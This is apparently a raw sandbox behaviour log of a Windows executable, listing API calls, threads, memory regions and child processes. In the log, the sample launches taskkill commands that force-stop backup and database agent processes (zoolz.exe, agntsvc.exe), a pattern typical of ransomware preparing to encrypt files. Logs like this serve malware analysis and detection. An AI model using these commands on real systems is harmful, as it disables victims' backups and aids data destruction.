[0140.884] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf6f0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fivjf.exe")) returned 0x2f [0140.884] GetModuleHandleW (lpModuleName=0x0) returned 0x13f0e0000 [0140.884] GetModuleHandleW (lpModuleName=0x0) returned 0x13f0e0000 [0140.885] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0140.885] GetLastError () returned 0x57 [0140.885] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0140.886] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0140.886] GetLastError () returned 0x57 [0140.886] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0140.886] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x1cf8c8 | out: phModule=0x1cf8c8) returned 0 [0140.886] RtlExitUserProcess (ExitCode=0x0) Thread: id = 2 os_tid = 0x96c Thread: id = 3 os_tid = 0x970 Thread: id = 4 os_tid = 0x974 Thread: id = 5 os_tid = 0x978 Thread: id = 7 os_tid = 0x984 Thread: id = 9 os_tid = 0x990 Thread: id = 11 os_tid = 0x9ac Thread: id = 13 os_tid = 0x9cc Thread: id = 15 os_tid = 0x9e0 Thread: id = 17 os_tid = 0xa10 Thread: id = 22 os_tid = 0xa30 Thread: id = 30 os_tid = 0xa68 Thread: id = 74 os_tid = 0xa88 Thread: id = 98 os_tid = 0xb00 Thread: id = 100 os_tid = 0xb18 Thread: id = 106 os_tid = 0xb54 Thread: id = 119 os_tid = 0xbc4 Thread: id = 121 os_tid = 0xbd8 Thread: id = 125 os_tid = 0xbf4 Thread: id = 134 os_tid = 0x570 Thread: id = 138 os_tid = 0x1e0 Thread: id = 143 os_tid = 0x510 Thread: id = 147 os_tid = 0x6f8 Thread: id = 160 os_tid = 0x7f0 Thread: id = 170 os_tid = 0x628 Thread: id = 178 os_tid = 0x8ec Thread: id = 180 os_tid = 0x930 Thread: id = 184 os_tid = 0x950 Thread: id = 193 os_tid = 0x910 Thread: id = 196 os_tid = 0x934 Thread: id = 212 os_tid = 0xb0c Thread: id = 215 os_tid = 0xbe8 Thread: id = 224 os_tid = 0x628 Thread: id = 227 os_tid = 0x940 Thread: id = 237 os_tid = 0xc24 Thread: id = 240 os_tid = 0xc40 Thread: id = 254 os_tid = 0xc8c Thread: id = 258 os_tid = 0xca8 Thread: id = 263 os_tid = 0xcd4 Thread: id = 266 os_tid = 0xcf4 Thread: id = 275 os_tid = 0xd30 Thread: id = 278 os_tid = 0xd50 Thread: id = 301 os_tid = 0xdbc Thread: id = 309 os_tid = 0xdf0 Thread: id = 325 os_tid = 0xe44 Thread: id = 329 os_tid = 0xe60 Thread: id = 346 os_tid = 0xec0 Thread: id = 351 os_tid = 0xee8 Thread: id = 359 os_tid = 0xf24 Thread: id = 365 os_tid = 0xf40 Thread: id = 368 os_tid = 0xf64 Thread: id = 378 os_tid = 0xfb4 Thread: id = 382 os_tid = 0xfd0 Thread: id = 387 os_tid = 0x940 Thread: id = 389 os_tid = 0xca8 Thread: id = 393 os_tid = 0xdfc Thread: id = 395 os_tid = 0xec0 Thread: id = 398 os_tid = 0xf64 Thread: id = 401 os_tid = 0xfd4 Thread: id = 403 os_tid = 0xf1c Thread: id = 410 os_tid = 0xdfc Thread: id = 412 os_tid = 0xfac Thread: id = 416 os_tid = 0xef8 Thread: id = 418 os_tid = 0x940 Thread: id = 423 os_tid = 0x934 Thread: id = 425 os_tid = 0xfc0 Thread: id = 428 os_tid = 0xee8 Thread: id = 454 os_tid = 0x1028 Thread: id = 466 os_tid = 0x1070 Thread: id = 479 os_tid = 0x10d0 Thread: id = 483 os_tid = 0x10f4 Thread: id = 485 os_tid = 0x1118 Thread: id = 487 os_tid = 0x1130 Thread: id = 490 os_tid = 0x1150 Thread: id = 494 os_tid = 0x1178 Thread: id = 496 os_tid = 0x11a4 Thread: id = 499 os_tid = 0x11c0 Thread: id = 501 os_tid = 0x11d8 Thread: id = 505 os_tid = 0x1208 Thread: id = 509 os_tid = 0x1244 Thread: id = 514 os_tid = 0x1274 Thread: id = 517 os_tid = 0x1298 Thread: id = 520 os_tid = 0x12b8 Thread: id = 522 os_tid = 0x12d8 Thread: id = 526 os_tid = 0x13dc Thread: id = 532 os_tid = 0xf5c Thread: id = 534 os_tid = 0xfe8 Thread: id = 536 os_tid = 0xf58 Thread: id = 540 os_tid = 0x1088 Thread: id = 542 os_tid = 0x105c Thread: id = 544 os_tid = 0x1070 Thread: id = 546 os_tid = 0xfd4 Thread: id = 551 os_tid = 0x1118 Thread: id = 553 os_tid = 0x10b4 Thread: id = 555 os_tid = 0x1144 Thread: id = 557 os_tid = 0x1124 Thread: id = 562 os_tid = 0x10e4 Thread: id = 566 os_tid = 0x1120 Thread: id = 568 os_tid = 0x1244 Thread: id = 572 os_tid = 0x124c Thread: id = 574 os_tid = 0x1298 Thread: id = 577 os_tid = 0xaa0 Thread: id = 579 os_tid = 0x1174 Thread: id = 581 os_tid = 0x12b8 Thread: id = 586 os_tid = 0x12e4 Thread: id = 588 os_tid = 0xab4 Thread: id = 591 os_tid = 0x7f8 Thread: id = 594 os_tid = 0xba8 Thread: id = 599 os_tid = 0x1320 Thread: id = 601 os_tid = 0x132c Thread: id = 604 os_tid = 0x1308 Thread: id = 606 os_tid = 0x1240 Thread: id = 608 os_tid = 0x9b0 Thread: id = 613 os_tid = 0x9f8 Thread: id = 615 os_tid = 0x2b4 Thread: id = 618 os_tid = 0x78c Thread: id = 621 os_tid = 0xa64 Thread: id = 624 os_tid = 0xaac Thread: id = 626 os_tid = 0x8c8 Thread: id = 629 os_tid = 0x1210 Thread: id = 635 os_tid = 0xc60 Thread: id = 637 os_tid = 0xc6c Thread: id = 641 os_tid = 0x61c Thread: id = 643 os_tid = 0xb30 Thread: id = 647 os_tid = 0xd10 Thread: id = 649 os_tid = 0xa34 Thread: id = 651 os_tid = 0x8c0 Thread: id = 655 os_tid = 0xb2c Thread: id = 657 os_tid = 0x938 Thread: id = 660 os_tid = 0xc64 Thread: id = 665 os_tid = 0xa9c Thread: id = 667 os_tid = 0xa7c Thread: id = 669 os_tid = 0x8cc Thread: id = 673 os_tid = 0x774 Thread: id = 675 os_tid = 0xbd0 Thread: id = 677 os_tid = 0xb08 Thread: id = 682 os_tid = 0xa38 Thread: id = 684 os_tid = 0xb4c Thread: id = 689 os_tid = 0x11e0 Thread: id = 691 os_tid = 0xd94 Thread: id = 693 os_tid = 0xe1c Thread: id = 696 os_tid = 0x13fc Thread: id = 698 os_tid = 0xd88 Thread: id = 704 os_tid = 0xdb8 Thread: id = 706 os_tid = 0xda0 Thread: id = 708 os_tid = 0x12a8 Thread: id = 710 os_tid = 0x11e4 Thread: id = 715 os_tid = 0xccc Thread: id = 717 os_tid = 0xdb4 Thread: id = 721 os_tid = 0xcf4 Thread: id = 723 os_tid = 0xff4 Thread: id = 725 os_tid = 0xf2c Thread: id = 728 os_tid = 0xf88 Thread: id = 734 os_tid = 0xdfc Thread: id = 736 os_tid = 0x12d0 Thread: id = 738 os_tid = 0xf10 Thread: id = 742 os_tid = 0xde8 Thread: id = 744 os_tid = 0xe58 Thread: id = 749 os_tid = 0x1088 Thread: id = 751 os_tid = 0xffc Thread: id = 753 os_tid = 0xec0 Thread: id = 755 os_tid = 0x1070 Thread: id = 757 os_tid = 0xfd4 Thread: id = 759 os_tid = 0x1010 Thread: id = 761 os_tid = 0x1080 Thread: id = 763 os_tid = 0x10cc Thread: id = 765 os_tid = 0xce8 Thread: id = 767 os_tid = 0xd58 Thread: id = 772 os_tid = 0x10e8 Thread: id = 774 os_tid = 0x10f8 Thread: id = 778 os_tid = 0x106c Thread: id = 780 os_tid = 0x10a0 Thread: id = 784 os_tid = 0x1108 Thread: id = 786 os_tid = 0xa1c Thread: id = 790 os_tid = 0xb8c Thread: id = 792 os_tid = 0x1208 Thread: id = 794 os_tid = 0x13d0 Thread: id = 799 os_tid = 0x12f4 Thread: id = 807 os_tid = 0xa74 Thread: id = 816 os_tid = 0xa0c Thread: id = 820 os_tid = 0xa48 Thread: id = 823 os_tid = 0x928 Thread: id = 825 os_tid = 0xabc Thread: id = 827 os_tid = 0x688 Thread: id = 832 os_tid = 0xad8 Thread: id = 834 os_tid = 0xaac Thread: id = 839 os_tid = 0x1210 Thread: id = 841 os_tid = 0xb38 Thread: id = 844 os_tid = 0x1098 Thread: id = 849 os_tid = 0xb14 Thread: id = 851 os_tid = 0x780 Thread: id = 853 os_tid = 0x570 Thread: id = 859 os_tid = 0xb90 Thread: id = 861 os_tid = 0xaa8 Thread: id = 864 os_tid = 0xd14 Thread: id = 866 os_tid = 0xcb0 Thread: id = 869 os_tid = 0x55c Thread: id = 871 os_tid = 0x910 Thread: id = 873 os_tid = 0x1368 Thread: id = 878 os_tid = 0x9c4 Thread: id = 884 os_tid = 0x108c Thread: id = 886 os_tid = 0xc80 Thread: id = 888 os_tid = 0x8cc Thread: id = 890 os_tid = 0xbc4 Thread: id = 893 os_tid = 0xb24 Thread: id = 895 os_tid = 0x950 Thread: id = 900 os_tid = 0xc30 Thread: id = 904 os_tid = 0x804 Thread: id = 906 os_tid = 0x6d8 Thread: id = 908 os_tid = 0xd94 Thread: id = 910 os_tid = 0xaf8 Thread: id = 913 os_tid = 0x114 Thread: id = 918 os_tid = 0xe10 Thread: id = 921 os_tid = 0xc74 Thread: id = 924 os_tid = 0xd90 Thread: id = 927 os_tid = 0xc78 Thread: id = 930 os_tid = 0x12a8 Thread: id = 933 os_tid = 0xca0 Thread: id = 936 os_tid = 0x11b8 Thread: id = 940 os_tid = 0xd2c Thread: id = 942 os_tid = 0xe4c Thread: id = 944 os_tid = 0xe68 Thread: id = 946 os_tid = 0xe98 Thread: id = 948 os_tid = 0xae4 Thread: id = 950 os_tid = 0xdc4 Thread: id = 952 os_tid = 0x6dc Thread: id = 957 os_tid = 0xf7c Thread: id = 961 os_tid = 0xf80 Thread: id = 965 os_tid = 0x7c0 Thread: id = 970 os_tid = 0xfd4 Thread: id = 972 os_tid = 0x1014 Process: id = "2" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x1af0d000" os_pid = "0x97c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM zoolz.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 218 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 219 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 220 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 221 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 222 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 223 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 224 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 225 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 226 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 227 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 228 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 229 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 230 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 231 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 232 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 324 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 325 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 326 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 327 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 328 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 329 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 330 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 331 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 332 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 333 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 334 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 335 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 336 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 337 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 338 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 339 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 340 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 341 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 342 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 343 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 344 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 345 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 346 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 347 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 348 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 349 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 350 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 351 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 352 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 353 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 354 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 385 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 386 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 387 start_va = 0x1e0000 end_va = 0x1e3fff entry_point = 0x1e0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 388 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 389 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 390 start_va = 0x290000 end_va = 0x34ffff entry_point = 0x290000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 391 start_va = 0x460000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 392 start_va = 0x5f0000 end_va = 0x770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 393 start_va = 0x780000 end_va = 0x1b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 394 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 395 start_va = 0x1b90000 end_va = 0x1b90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b90000" filename = "" Region: id = 396 start_va = 0x1ce0000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 397 start_va = 0x1dd0000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 398 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 399 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 400 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 401 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 402 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 403 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 404 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 405 start_va = 0x1bb0000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 406 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 407 start_va = 0x1e50000 end_va = 0x211efff entry_point = 0x1e50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 408 start_va = 0x2140000 end_va = 0x21bffff entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 409 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 410 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 411 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 412 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Thread: id = 6 os_tid = 0x980 Thread: id = 18 os_tid = 0xa14 Thread: id = 24 os_tid = 0xa4c Thread: id = 75 os_tid = 0xa90 Thread: id = 76 os_tid = 0xa94 Process: id = "3" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x79f35000" os_pid = "0x988" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM agntsvc.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 233 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 234 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 235 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 236 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 237 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 238 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 239 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 240 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 241 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 242 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 243 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 244 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 245 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 246 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 247 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 